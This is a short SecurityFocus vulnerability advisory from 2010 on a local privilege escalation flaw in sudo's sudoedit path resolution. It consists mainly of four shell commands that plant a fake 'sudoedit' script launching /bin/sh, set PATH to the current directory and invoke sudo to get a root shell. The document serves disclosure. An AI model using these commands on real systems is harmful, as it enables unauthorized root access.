Todd Miller Sudo 'sudoedit' Path Resolution Local Privilege Escalation Vulnerability

Local attackers can use readily available commands to exploit this issue.

The following example commands are available:

$ echo "/bin/sh" > sudoedit
$ /usr/bin/chmod +x sudoedit
$ export PATH=.
$ /usr/bin/sudo sudoedit /etc/hosts


 

Privacy Statement
Copyright 2010, SecurityFocus